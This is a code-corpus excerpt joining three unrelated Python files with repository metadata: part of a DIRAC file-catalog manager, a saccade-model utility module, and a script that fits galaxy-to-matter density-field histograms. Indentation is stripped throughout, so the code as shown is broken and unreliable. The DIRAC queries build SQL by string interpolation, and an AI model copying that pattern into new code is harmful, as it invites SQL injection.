successful = res['Value']['Successful']
origFailed = res['Value']['Failed']
for lfn in successful:
successful[lfn] = lfn
failed = {}
if self.db.uniqueGUID:
guidList = []
val = None
# Try to identify if the GUID is given
# We consider only 2 options :
# either {lfn : guid}
# or P lfn : {PFN : .., GUID : ..} }
if isinstance(lfns, dict):
val = list(lfns.values())
# We have values, take the first to identify the type
if val:
val = val[0]
if isinstance(val, dict) and 'GUID' in val:
# We are in the case {lfn : {PFN:.., GUID:..}}
guidList = [lfns[lfn]['GUID'] for lfn in lfns]
elif isinstance(val, six.string_types):
# We hope that it is the GUID which is given
guidList = list(lfns.values())
if guidList:
# A dict { guid: lfn to which it is supposed to be associated }
guidToGivenLfn = dict(zip(guidList, lfns))
res = self.getLFNForGUID(guidList, connection)
if not res['OK']:
return res
guidLfns = res['Value']['Successful']
for guid, realLfn in guidLfns.items():
successful[guidToGivenLfn[guid]] = realLfn
for lfn, error in origFailed.items():
# It could be in successful because the guid exists with another lfn
if lfn in successful:
continue
if error == 'No such file or directory':
successful[lfn] = False
else:
failed[lfn] = error
return S_OK({"Successful": successful, "Failed": failed})
def isFile(self, lfns, connection=False):
""" Determine whether a path is a file in the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
return self.exists(lfns, connection=connection)
def getFileSize(self, lfns, connection=False):
""" Get file size from the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
res = self._findFiles(lfns, ['Size'], connection=connection)
if not res['OK']:
return res
totalSize = 0
for lfn in res['Value']['Successful']:
size = res['Value']['Successful'][lfn]['Size']
res['Value']['Successful'][lfn] = size
totalSize += size
res['TotalSize'] = totalSize
return res
def getFileMetadata(self, lfns, connection=False):
""" Get file metadata from the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
return self._findFiles(lfns, ['Size', 'Checksum',
'ChecksumType', 'UID',
'GID', 'GUID',
'CreationDate', 'ModificationDate',
'Mode', 'Status'], connection=connection)
def getPathPermissions(self, paths, credDict, connection=False):
""" Get the permissions for the supplied paths """
connection = self._getConnection(connection)
res = self.db.ugManager.getUserAndGroupID(credDict)
if not res['OK']:
return res
uid, gid = res['Value']
res = self._findFiles(paths, metadata=['Mode', 'UID', 'GID'], connection=connection)
if not res['OK']:
return res
successful = {}
for dirName, dirDict in res['Value']['Successful'].items():
mode = dirDict['Mode']
p_uid = dirDict['UID']
p_gid = dirDict['GID']
successful[dirName] = {}
if p_uid == uid:
successful[dirName]['Read'] = mode & stat.S_IRUSR
successful[dirName]['Write'] = mode & stat.S_IWUSR
successful[dirName]['Execute'] = mode & stat.S_IXUSR
elif p_gid == gid:
successful[dirName]['Read'] = mode & stat.S_IRGRP
successful[dirName]['Write'] = mode & stat.S_IWGRP
successful[dirName]['Execute'] = mode & stat.S_IXGRP
else:
successful[dirName]['Read'] = mode & stat.S_IROTH
successful[dirName]['Write'] = mode & stat.S_IWOTH
successful[dirName]['Execute'] = mode & stat.S_IXOTH
return S_OK({'Successful': successful, 'Failed': res['Value']['Failed']})
######################################################
#
# Replica read methods
#
def __getReplicasForIDs(self, fileIDLfnDict, allStatus, connection=False):
""" Get replicas for files with already resolved IDs
"""
replicas = {}
if fileIDLfnDict:
fields = []
if not self.db.lfnPfnConvention or self.db.lfnPfnConvention == "Weak":
fields = ['PFN']
res = self._getFileReplicas(list(fileIDLfnDict), fields_input=fields,
allStatus=allStatus, connection=connection)
if not res['OK']:
return res
for fileID, seDict in res['Value'].items():
lfn = fileIDLfnDict[fileID]
replicas[lfn] = {}
for se, repDict in seDict.items():
pfn = repDict.get('PFN', '')
replicas[lfn][se] = pfn
result = S_OK(replicas)
return result
def getReplicas(self, lfns, allStatus, connection=False):
""" Get file replicas from the catalog """
connection = self._getConnection(connection)
# Get FileID <-> LFN correspondence first
res = self._findFileIDs(lfns, connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
fileIDLFNs = {}
for lfn, fileID in res['Value']['Successful'].items():
fileIDLFNs[fileID] = lfn
result = self.__getReplicasForIDs(fileIDLFNs, allStatus, connection)
if not result['OK']:
return result
replicas = result['Value']
return S_OK({"Successful": replicas, 'Failed': failed})
def getReplicasByMetadata(self, metaDict, path, allStatus, credDict, connection=False):
""" Get file replicas for files corresponding to the given metadata """
connection = self._getConnection(connection)
# Get FileID <-> LFN correspondence first
failed = {}
result = self.db.fmeta.findFilesByMetadata(metaDict, path, credDict)
if not result['OK']:
return result
idLfnDict = result['Value']
result = self.__getReplicasForIDs(idLfnDict, allStatus, connection)
if not result['OK']:
return result
replicas = result['Value']
return S_OK({"Successful": replicas, 'Failed': failed})
def getReplicaStatus(self, lfns, connection=False):
""" Get replica status from the catalog """
connection = self._getConnection(connection)
res = self._findFiles(lfns, connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
fileIDLFNs = {}
for lfn, fileDict in res['Value']['Successful'].items():
fileID = fileDict['FileID']
fileIDLFNs[fileID] = lfn
successful = {}
if fileIDLFNs:
res = self._getFileReplicas(list(fileIDLFNs), allStatus=True, connection=connection)
if not res['OK']:
return res
for fileID, seDict in res['Value'].items():
lfn = fileIDLFNs[fileID]
requestedSE = lfns[lfn]
if not requestedSE:
failed[lfn] = "Replica info not supplied"
elif requestedSE not in seDict:
failed[lfn] = "No replica at supplied site"
else:
successful[lfn] = seDict[requestedSE]['Status']
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# General usage methods
#
def _getStatusInt(self, status, connection=False):
connection = self._getConnection(connection)
req = "SELECT StatusID FROM FC_Statuses WHERE Status = '%s';" % status
res = self.db._query(req, connection)
if not res['OK']:
return res
if res['Value']:
return S_OK(res['Value'][0][0])
req = "INSERT INTO FC_Statuses (Status) VALUES ('%s');" % status
res = self.db._update(req, connection)
if not res['OK']:
return res
return S_OK(res['lastRowId'])
def _getIntStatus(self, statusID, connection=False):
if statusID in self.statusDict:
return S_OK(self.statusDict[statusID])
connection = self._getConnection(connection)
req = "SELECT StatusID,Status FROM FC_Statuses"
res = self.db._query(req, connection)
if not res['OK']:
return res
if res['Value']:
for row in res['Value']:
self.statusDict[int(row[0])] = row[1]
if statusID in self.statusDict:
return S_OK(self.statusDict[statusID])
return S_OK('Unknown')
def getFileIDsInDirectory(self, dirID, requestString=False):
""" Get a list of IDs for all the files stored in given directories or their
subdirectories
:param dirID: single directory ID or a list of directory IDs
:type dirID: int or python:list[int]
:param bool requestString: if True return result as a SQL SELECT string
:return: list of file IDs or SELECT string
"""
return self._getDirectoryFileIDs(dirID, requestString=requestString)
def getFilesInDirectory(self, dirID, verbose=False, connection=False):
connection = self._getConnection(connection)
files = {}
res = self._getDirectoryFiles(dirID, [], ['FileID', 'Size', 'GUID',
'Checksum', 'ChecksumType',
'Type', 'UID',
'GID', 'CreationDate',
'ModificationDate', 'Mode',
'Status'], connection=connection)
if not res['OK']:
return res
if not res['Value']:
return S_OK(files)
fileIDNames = {}
for fileName, fileDict in res['Value'].items():
files[fileName] = {}
files[fileName]['MetaData'] = fileDict
fileIDNames[fileDict['FileID']] = fileName
if verbose:
result = self._getFileReplicas(list(fileIDNames), connection=connection)
if not result['OK']:
return result
for fileID, seDict in result['Value'].items():
fileName = fileIDNames[fileID]
files[fileName]['Replicas'] = seDict
return S_OK(files)
def getDirectoryReplicas(self, dirID, path, allStatus=False, connection=False):
""" Get the replicas for all the Files in the given Directory
:param int dirID: ID of the directory
:param unused path: useless
:param bool allStatus: whether all replicas and file status are considered
If False, take the visibleFileStatus and visibleReplicaStatus values from the configuration
"""
connection = self._getConnection(connection)
result = self._getDirectoryReplicas(dirID, allStatus, connection)
if not result['OK']:
return result
resultDict = {}
seDict = {}
for fileName, fileID, seID, pfn in result['Value']:
resultDict.setdefault(fileName, {})
if seID not in seDict:
res = self.db.seManager.getSEName(seID)
if not res['OK']:
seDict[seID] = 'Unknown'
else:
seDict[seID] = res['Value']
se = seDict[seID]
resultDict[fileName][se] = pfn
return S_OK(resultDict)
def _getFileDirectories(self, lfns):
""" For a list of lfn, returns a dictionary with key the directory, and value
the files in that directory. It does not make any query, just splits the names
:param lfns: list of lfns
:type lfns: python:list
"""
dirDict = {}
for lfn in lfns:
lfnDir = os.path.dirname(lfn)
lfnFile = os.path.basename(lfn)
dirDict.setdefault(lfnDir, [])
dirDict[lfnDir].append(lfnFile)
return dirDict
def _checkInfo(self, info, requiredKeys):
if not info:
return S_ERROR("Missing parameters")
for key in requiredKeys:
if key not in info:
return S_ERROR("Missing '%s' parameter" % key)
return S_OK()
# def _checkLFNPFNConvention( self, lfn, pfn, se ):
# """ Check that the PFN corresponds to the LFN-PFN convention """
# if pfn == lfn:
# return S_OK()
# if ( len( pfn ) < len( lfn ) ) or ( pfn[-len( lfn ):] != lfn ) :
# return S_ERROR( 'PFN does not correspond to the LFN convention' )
# return S_OK()
def changeFileGroup(self, lfns):
""" Get set the group for the supplied files
:param lfns: dictionary < lfn : group >
:param int/str newGroup: optional new group/groupID the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'GID'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
group = lfns[lfn]
if isinstance(group, six.string_types):
groupRes = self.db.ugManager.findGroup(group)
if not groupRes['OK']:
return groupRes
group = groupRes['Value']
currentGroup = res['Value']['Successful'][lfn]['GID']
if int(group) == int(currentGroup):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "GID", group)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def changeFileOwner(self, lfns):
""" Set the owner for the supplied files
:param lfns: dictionary < lfn : owner >
:param int/str newOwner: optional new user/userID the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'UID'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
owner = lfns[lfn]
if isinstance(owner, six.string_types):
userRes = self.db.ugManager.findUser(owner)
if not userRes['OK']:
return userRes
owner = userRes['Value']
currentOwner = res['Value']['Successful'][lfn]['UID']
if int(owner) == int(currentOwner):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "UID", owner)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def changeFileMode(self, lfns):
"""" Set the mode for the supplied files
:param lfns: dictionary < lfn : mode >
:param int newMode: optional new mode the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'Mode'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
mode = lfns[lfn]
currentMode = res['Value']['Successful'][lfn]['Mode']
if int(currentMode) == int(mode):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "Mode", mode)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def setFileOwner(self, path, owner):
""" Set the file owner
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param owner: new user as a string or int uid
:type owner: str or int
"""
result = self.db.ugManager.findUser(owner)
if not result['OK']:
return result
uid = result['Value']
return self._setFileParameter(path, 'UID', uid)
def setFileGroup(self, path, gname):
""" Set the file group
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param gname: new group as a string or int gid
:type gname: str or int
"""
result = self.db.ugManager.findGroup(gname)
if not result['OK']:
return result
gid = result['Value']
return self._setFileParameter(path, 'GID', gid)
def setFileMode(self, path, mode):
""" Set the file mode
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param int mode: new mode
"""
return self._setFileParameter(path, 'Mode', mode)
def getSEDump(self, seName):
"""
Return all the files at a given SE, together with checksum and size
:param seName: name of the StorageElement
:returns: S_OK with list of tuples (lfn, checksum, size)
"""
return S_ERROR("To be implemented on derived class")
|
yujikato/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/FileManager/FileManagerBase.py
|
Python
|
gpl-3.0
| 48,207
|
[
"DIRAC"
] |
f5aff59dd7d6ab614c7ac83b06dfedc580f147c206e04660cac7fd854f7f3c8a
|
'''
Here we use two different concepts, times and indices:
Time t 0 1 2 3 4 5
| | | | | |
Vector [ 2 3 1 2 1 ]
| | | | |
Index i 0 1 2 3 4
'''
def select_points_before_time(X, t):
# Return points before given time index
return select_first_points(X, t)
def select_points_after_time(X, t):
# Return columns after given time index.
return X[t:] # Python handles out of range cases by returning []
def select_first_points(X, n):
# Return first max n points of X.
return X[:n]
def select_last_points(X, n):
# Return last max n points of X
if n > 0:
return X[-n:]
else:
return []
def select_points_time_to_time(X, t1, t2):
# Return points according to the time interpretation of indices.
# Precondition: t1 <= t2 and t1,t2 >= 0.
# Return points from t1 to end, use .._to_time(X, t1, None)
return X[t1:t2] # Element at index t2 is excluded
def mean_point(X):
# Calculate mean of the points
sum_x = 0
sum_y = 0
for p in X:
sum_x += p[0]
sum_y += p[1]
n = len(X)
return [float(sum_x) / n, float(sum_y) / n]
def weighted_mean_point(X, W):
# Precondition: sum(W) = 1
sum_x = 0.0
sum_y = 0.0
for p, w in zip(X, W):
sum_x += w * p[0]
sum_y += w * p[1]
return [sum_x, sum_y]
class TimePairValueHistory(object):
def __init__(self):
self._history = {}
self._min_value_t1 = -1
self._min_value_t2 = -1
self._min_value = float('inf')
self._min_value_data = None
def is_visited(self, t1, t2):
k1 = str(t1)
k2 = str(t2)
if k1 in self._history:
if k2 in self._history[k1]:
return True
return False
def is_minimal(self, t1, t2):
return t1 == self._min_value_t1 and t2 == self._min_value_t2
def visit(self, t1, t2, value, data):
'''
Return nothing
'''
if self.is_visited(t1, t2):
return
k1 = str(t1)
k2 = str(t2)
if k1 not in self._history:
self._history[k1] = {}
self._history[k1][k2] = True
if value < self._min_value:
self._min_value = value
self._min_value_t1 = t1
self._min_value_t2 = t2
self._min_value_data = data
def get_minimum(self):
'''
Return
(t1, t2, value) triple where the value is the minimal one.
'''
return (self._min_value_t1, self._min_value_t2,
self._min_value, self._min_value_data)
|
infant-cognition-tampere/saccademodel-py
|
saccademodel/utils.py
|
Python
|
mit
| 2,622
|
[
"VisIt"
] |
4b2c0c247cd3bf0f3854797250c8f90be5f13abe66ddbea80db20a67f698c5ca
|
# cd pySU/pyMultidark/trunk/bin/fortranfile-0.2.1/
import sys
import numpy as n
import os
from os.path import join
from astropy.io import fits
import time
import cPickle
from scipy.interpolate import interp1d
from scipy.optimize import curve_fit
from scipy.stats import scoreatpercentile as sc
from scipy.stats import norm
import matplotlib.pyplot as p
from matplotlib.ticker import NullFormatter
nullfmt = NullFormatter() # no labels
from scipy.optimize import curve_fit
DFdir = join("/data2", "users", "gustavo", "BigMD", "1Gpc_3840_Planck1_New", "DENSFIELDS")
# mockDir = "/data1/DATA/eBOSS/Multidark-box-mocks/parts/"
mockDir = join("..","MD_1Gpc","density_field")
#inFiles = n.array(["dmdens_cic_104_DFhist.dat",cd "dmdens_cic_101_DFhist.dat", "dmdens_cic_097_DFhist.dat", "dmdens_cic_087_DFhist.dat"])
# inFiles = n.array(["dmdens_cic_104_DF0DF1hist.dat", "dmdens_cic_101_DF0DF1hist.dat", "dmdens_cic_097_DF0DF1hist.dat", "dmdens_cic_087_DF0DF1hist.dat"])
inFiles = n.array(["dmdens_cic_104_DFhist.dat", "dmdens_cic_101_DFhist.dat", "dmdens_cic_097_DFhist.dat", "dmdens_cic_087_DFhist.dat"])
# ZS = 0.7 0.8 1.0 1.48
bins = n.hstack((0,n.logspace(-3, 4, 1000)))
dx = bins[1:] - bins[:-1]
xb = (bins[1:]+bins[:-1])/2.
"""
ii=0
f=open(join(mockDir, inFiles[ii]))
bins, HDF0, HDF1, H = cPickle.load(f)
f.close()
X, Y = n.meshgrid(xb,xb)
N0 = HDF0 /dx / (1000.-2*1000./2048)**3.
N1 = HDF1 /dx / (1000.-2*1000./2048)**3.
inGal = n.array([ "Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.701838_nbar1.350000e-05_QSO.DF.fits.gz", "Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz" ])
"""
#################################################
#################################################
# delta - probability to have a galaxy relation
#################################################
#################################################
def getNN(inGalFile, bins = bins):
hd = fits.open(inGalFile)[1].data
Hqso, xedges, yedges = n.histogram2d(hd['DF'], hd['DF_N1'], bins)
HDF0qso = n.histogram(hd['DF'], bins= bins)[0] #n.logspace(-1.5,4,80))
HDF1qso = n.histogram(hd['DF_N1'], bins= bins)[0] #n.logspace(-1.5,4,80))
N0qso = HDF0qso /dx / 1000.**3.
N1qso = HDF1qso /dx / 1000.**3.
return Hqso, N0qso, N1qso
def getNN0_sim(inSim):
f=open(join(mockDir, inSim))
bins, HDF0 = cPickle.load(f)
f.close()
#bins = n.hstack((0,n.logspace(-3, 4, 1000)))
xb = (bins[1:]+bins[:-1])/2.
dx = bins[1:] - bins[:-1]
X, Y = n.meshgrid(xb,xb)
N0 = HDF0 /dx / (1000.-2*1000./2048)**3.
return N0, bins
def getNN0(inGalFile, bins):
hd = fits.open(inGalFile)[1].data
HDF0, bins = n.histogram(hd['DF'], bins= bins) #n.logspace(-1.5,4,80))
dx = bins[1:] - bins[:-1]
N0 = HDF0 /dx / 1000.**3.
return N0, HDF0
"""
def smooth(Hin, ns=4, xb = (bins[1:]+bins[:-1])/2.):
n1, n2 = H.shape
nNew = int(float(n1)/ns)
print nNew
Hout = n.empty(( nNew, nNew ))
xout = n.empty((nNew))
for ii in n.arange(nNew):
idI = n.arange(ii*ns, (ii+1)*ns, 1)
xout[ii] = (xb[idI[-1]] + xb[idI[0]]) /2.
for jj in n.arange(nNew):
idJ = n.arange(jj*ns, (jj+1)*ns, 1)
idX, idY = n.meshgrid(idI,idJ)
Hout[ii, jj] = n.sum(n.array([Hin[n.hstack(idX)[kk], n.hstack(idY)[kk]] for kk in range(ns**2)]))
#print ii, jj
#print n.transpose([n.hstack(idX),n.hstack(idY)])
#print "-------------------------------------------------------------------"
return xout, Hout
"""
#################################################
#################################################
# density field order 0 : distribution
#################################################
#################################################
NR=10
N0z07s, binsz07s = getNN0_sim(inFiles[0])
N0z07 = n.array([N0z07s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07 = binsz07s[::NR]
N0z08s, binsz08s = getNN0_sim(inFiles[1])
N0z08 = n.array([N0z08s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08 = binsz08s[::NR]
N0z15s, binsz15s = getNN0_sim(inFiles[3])
N0z15 = n.array([N0z15s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz15 = binsz15s[::NR]
bins = binsz07
xb = (bins[1:]+bins[:-1])/2.
dx = bins[1:] - bins[:-1]
inGal = n.array([ "Box_HAM_z0.701838_nbar1.350000e-05_QSO.DF.fits.gz","Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z1.480160_nbar1.930000e-05_QSO.DF.fits.gz" ])
N0qsoz07, N0qsoz07T = getNN0(join( mockDir,inGal[0]), bins)
N0qsoz08, N0qsoz08T = getNN0(join( mockDir,inGal[1]), bins)
N0qsoz15, N0qsoz15T = getNN0(join( mockDir,inGal[2]), bins)
p.figure(0)
p.title('QSO')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0qsoz07,'ko', rasterized=True, label='z=0.7 qso')
p.plot(xb, N0qsoz08,'bo', rasterized=True, label='z=0.8 qso')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.plot(xb, N0z15,'rx', rasterized=True, label='z=1.5 all')
p.plot(xb, N0qsoz15,'ro', rasterized=True, label='z=1.5 qso')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-QSO-delta-HDF0.png"))
p.clf()
p.figure(0)
p.title('QSO')
p.plot(xb, N0qsoz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, N0qsoz08/N0z08,'bx', rasterized=True, label='z=0.8')
p.plot(xb, N0qsoz15/N0z15,'rx', rasterized=True, label='z=1.5')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10 , 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-QSO-delta-HDF0-ratio.png"))
p.clf()
inGal = n.array([ "Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.818843_nbar1.000000e-04_LRG.DF.fits.gz"])
N0lrgz07, N0lrgz07T = getNN0(join( mockDir,inGal[0]), bins)
N0lrgz08, N0lrgz08T = getNN0(join( mockDir,inGal[1]), bins)
p.figure(0)
p.title('LRG')
p.plot(xb, N0lrgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, N0lrgz08/N0z08,'bx', rasterized=True, label='z=0.8')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-LRG-delta-HDF0-ratio.png"))
p.clf()
p.figure(0)
p.title('LRG')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.plot(xb, N0lrgz07,'ko', rasterized=True, label='z=0.7 lrg')
p.plot(xb, N0lrgz08,'bo', rasterized=True, label='z=0.8 lrg')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-LRG-delta-HDF0.png"))
p.clf()
inGal = n.array([ "Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz" , "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
N0elgz07, N0elgz07T = getNN0(join( mockDir,inGal[0]), bins)
N0elgz08, N0elgz08T = getNN0(join( mockDir,inGal[1]), bins)
p.figure(0)
p.title('ELG')
p.plot(xb, N0elgz07/N0z07,'kx', rasterized=True, label='z=0.7')
#p.plot(xb, N0elgz08/N0z08,'bx', rasterized=True, label='z=0.8')
#p.plot(xb[xb>1e2], 10**fun(n.log10(xb[xb>1e2]), prs[0],prs[1],prs[2]), 'r--', lw = 2, label='')
#p.plot(xb[xb<10**1.2], 10**fun(n.log10(xb[xb<10**1.2]), prsL[0],prsL[1],prsL[2]), 'r--', lw = 2)
#p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2)
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-ELG-delta-HDF0-ratio.png"))
p.clf()
p.figure(0)
p.title('ELG')
p.plot(xb, N0elgz07,'ko', rasterized=True, label='z=0.7 elg')
p.plot(xb, N0elgz08,'bo', rasterized=True, label='z=0.8 elg')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-ELG-delta-HDF0.png"))
p.clf()
########## FIT z=1.5 QSO
NR = 5
N0z15R = n.array([N0z15[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz15R = binsz15[::NR]
N0qsoz15R = n.array([N0qsoz15[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz15R_sig = n.array([N0qsoz15[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz15R[1:]+binsz15R[:-1])/2.
dxR = binsz15R[1:] - binsz15R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz15T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz15T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz15R_sig)
ok = (N0qsoz15>0)&(N0z15>0)&(N0qsoz15/N0z15>-6)#&(xb>10**2)
y = n.log10(N0qsoz15[ok]/N0z15[ok])
yplus = n.log10((N0qsoz15[ok] + errorsP(xb[ok])*N0qsoz15[ok] )/N0z15[ok])
yminus = n.log10((N0qsoz15[ok] - errorsP(xb[ok])*N0qsoz15[ok] )/N0z15[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz15/N0z15,'kx', rasterized=True, label='z=1.5')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z15-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz15/N0z15)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=1.5')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z15-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z15.data",ps)
########## FIT z=0.8 LRG
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
N0lrgz08R = n.array([N0lrgz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0lrgz08R_sig = n.array([N0lrgz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0lrgz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0lrgz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0lrgz08R_sig)
ok = (N0lrgz08>0)&(N0z08>0)&(N0lrgz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0lrgz08[ok]/N0z08[ok])
yplus = n.log10((N0lrgz08[ok] + errorsP(xb[ok])*N0lrgz08[ok] )/N0z08[ok])
yminus = n.log10((N0lrgz08[ok] - errorsP(xb[ok])*N0lrgz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('LRG ')#+str(ps))
p.plot(xb, N0lrgz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2, label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('LRG')#+str(n.round(ps,5)))
p.plot(xb, (N0lrgz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-LRG-z08.data",ps)
########## FIT z=0.8 QSO
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
